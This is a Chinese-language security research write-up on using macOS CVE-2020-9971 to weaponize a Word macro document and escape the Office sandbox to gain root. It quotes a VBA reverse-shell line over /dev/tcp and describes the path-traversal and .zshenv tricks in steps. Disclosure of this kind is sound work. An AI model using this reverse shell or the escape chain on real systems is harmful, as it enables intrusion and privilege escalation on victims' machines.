在本文中，研究人員展示了他們如何利用已發布的 macOS/iOS 權限提升漏洞將 Word 文檔武器化，解除應用程序沙箱限制并獲得更高權限。

　　CVE-2020-9971 是 macOS/iOS 中的一個邏輯漏洞，可用于穩定的提權漏洞。在這篇文章中，研究人員 （@R3dF09） 提到它也可以在最受限制的應用沙箱中運行，因此研究人員決定對其進行測試并使用武器化的 Word 文檔繞過 Microsoft Office 2019（適用于 Mac）應用沙箱。為了完成這個任務，研究人員不得不使用一些有趣的技巧來繞過 Apple 的文件隔離。

　　CVE-2020-9971位于launchd進程中，與XPC Services機制有關。這種機制提供了進程間通信，允許開發人員創建為其應用程序執行特定任務的服務。這通常用于將應用程序拆分為更小的部分，從而提高可靠性和安全性。launchd是mac系統下通用的進程管理器，是mac系統下非常重要的一個進程，一般來說該進程不允許直接以命令行的形式調用。只能通過其控制管理界面，launchctl來進行控制。launchd主要功能是進程管理?？梢岳斫獬墒且粋€常駐在后臺的進程，根據用戶的配置，來響應特定的系統事件。launchd既可以用于系統級別的服務，又可以用于個人用戶級別的服務。

　　每個進程都有自己的域，由 launchd 管理，其中包含有關進程可用的 XPC 服務的信息。蘋果聲稱只有擁有者進程才能修改自己的域，但該漏洞的核心漏洞是能夠將任意 XPC 服務添加到任意進程域中，然后觸發它在該進程的上下文中運行。起初，攻擊者將自制的 XPC 服務“注入”到具有 root 權限的特定進程的域中（systemsoundserverd）。開發者還使用了 XPC 服務的一個眾所周知的功能來監聽套接字以觸發和啟動它。

　　接下來，研究人員將描述成功將 Word 文檔武器化并繞過 Word 應用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當時最新版本的 Microsoft Office 2019 上進行的，但這無關緊要，因為該漏洞在操作系統端。

　　漏洞利用

　　研究人員的第一個目標是創建一個獨立的命令行漏洞利用。在這個階段，研究人員認為他們只需要刪除它并從武器化的 Word 文檔中執行它即可，但實際情況并非如此。無論如何，研究人員用 XCode 創建了一個應用程序，附帶一個簡單的 XPC 服務，它執行以下步驟：

　　1.查找研究人員要使用的 root 特權進程的 PID。正如研究人員已經知道不可能在 Office 應用沙箱中執行 ps 一樣，研究人員改為使用 launchctl 打印系統的輸出，它顯示了系統中的進程域。此時研究人員注意到systemoundserverd的進程域是在啟動后延遲相當長的時間創建的，所以研究人員改用launchservicesd的進程域；

　　2.將研究人員的 XPC 服務注入到找到的 PID 的進程域中；

　　3.通過打開 TCP 套接字觸發研究人員的 XPC 服務的啟動；

　　附帶的XPC服務只創建一個文件（表示成功），并配置為在指定的TCP端口上偵聽。漏洞利用和 XPC 服務都存儲在同一個應用程序包中，但請注意研究人員有兩個不同的可執行文件。

　　通過這個獨立的漏洞利用，研究人員能夠從普通用戶那里獲得 root 權限，現在是時候開始實現研究人員的最終目標了——繞過沙盒。

　　繞過沙盒

　　研究人員的最終目標是使用此漏洞將 Word 文檔武器化，以繞過應用程序沙箱。其基礎是能夠從這個Word文檔中執行shell命令，這可以通過Microsoft Office中的其他漏洞實現，或者更容易通過VBA宏實現，這讓研究人員只剩下說服用戶按下“啟用宏”的工作。更多關于針對 Mac 用戶的基于宏的攻擊請點此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看。對于這個概念驗證，研究人員將使用 VBA 宏。

　　在 Office 應用沙箱的上下文中獲取 bash shell 很簡單，然后利用這些限制。研究人員所要做的就是偵聽特定端口（例如 netcat）并從 Word 文檔中執行以下 VBA 宏：

　　MacScript（“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”）

　　此時，在沙箱中有了一個shell，研究人員試圖轉儲并執行獨立漏洞，但它沒有奏效。經過一些研究，研究人員發現他們在沙箱中創建的每個文件都是使用“com.apple.quarantine”屬性創建的，這個可以通過 xattr 實用程序觀察到。

　　隔離屬性是許多 macOS 保護的核心，最初，它僅附加到從互聯網下載的文件中，以執行多項安全檢查（例如文件隔離、GateKeeper、Notarization 和 XProtect）。自從引入了沙箱之后，這個屬性又增加了一個角色——標記從沙箱中創建的文件，并完全阻止它們被執行。以下是研究人員試圖從沙箱shell中轉儲和執行一個文件時產生的日志：

　　kernel: （Sandbox） Sandbox: bash（1724） deny（1） process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test

　　kernel: （Quarantine） exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086

　　可以看到研究人員可以執行 shell 命令，但不能轉儲和運行他們自己的可執行文件。對于可利用的可執行文件，研究人員有一個簡單的替換方法：只需在ctypes包的幫助下運行一個執行相同步驟的python腳本?，F在研究人員就能夠將 XPC 服務注入目標進程域，甚至觸發它的執行，但它沒有運行：XPC 服務可執行文件本身被標記為隔離屬性。

　　現在是時候更深入地研究XPC服務的結構了。從外部看，它看起來像一個擴展名為“xpc”的單一文件，但它實際上是一個具有典型結構的文件夾：

　　主要組件是 Info.plist 文件，它是一個描述服務的 XML 文件，以及可執行文件本身（位于 MacOS 文件夾內）。Info.plist 中的部分內容如下：

　　< key >CFBundleExecutable< /key >< string >AppService< /string >

　　研究人員不能使用他們自己的可執行文件，所以唯一的選擇是使用系統現有的可執行文件之一。研究人員嘗試在 CFBundleExecutable 項中使用完整路徑，但是 XPC 服務根本無法加載。很明顯，macOS 會在目錄 Contents/MacOS 中查找具有此項中指定名稱的可執行文件，也許研究人員可以使用路徑遍歷來指向現有的可執行文件，并嘗試將值更改為：

　　< key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >

　　令研究人員驚訝的是，它奏效了！當研究人員使用這個“假”XPC 服務執行漏洞利用時，研究人員發現了一個具有 root 權限的“是”進程，即使研究人員是從沙箱中執行的。

　　因此，研究人員有能力以 root 權限運行進程，但似乎無法控制它們的參數。在團隊內部就這個問題進一步咨詢后，研究人員想出了一個好辦法，他們注意到可以控制新進程的環境變量，即運行一個 shell 作為 XPC 服務（例如 zsh），將其 HOME 目錄更改為研究人員可以控制，并將 shell 在執行開始時提供的文件放在那里（例如。zshenv）。

　　將它們全部封裝在一起

　　研究人員編寫了一個 python 腳本，執行以下步驟：

　　1.將“。zshenv”文件寫入當前目錄，在沙箱內，路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data，其中包含研究人員希望以 root 身份執行的載荷；

　　2.查找研究人員要使用的 root 權限進程的 PID （launchservicesd）；

　　3.創建“假”XPC 服務，其中可執行文件指向 zsh，并將 HOME 環境變量設置為當前目錄；

　　4.將“假”XPC 服務注入到找到的 PID 的進程域中；

　　5.通過打開 TCP 套接字觸發 XPC 服務的啟動；

　　然后研究人員將該腳本封裝為 base64 格式，以便從VBA宏中執行它，并將其插入到 AutoOpen 子例程中。具體演示過程請點此，其中有效載荷只在/tmp/hacked中創建一個文件（請注意，該文件是以 root 身份創建的，并且沒有隔離位）。

　　總結

　　研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞，以 Word 文檔作為研究人員的 POC。在這個過程中，研究人員發現了一種通過 XPC 服務啟動任意可執行文件的方法（在 CFBundleExecutable 值中進行路徑遍歷），特別是執行 shell 腳本（通過控制 HOME 環境變量和轉儲 .zshenv 文件的技巧）。

　　這個沙箱逃逸漏洞使研究人員能夠為 macOS 創建一個快速、簡單和廉價的武器化 Word 文檔，這嚴重危害了系統安全。

　　安全建議

　　1.避免打開陌生文檔，尤其是運行來自未知來源或你不完全信任的發送方；

　　2.使用能夠處理此類攻擊的綜合性安全產品。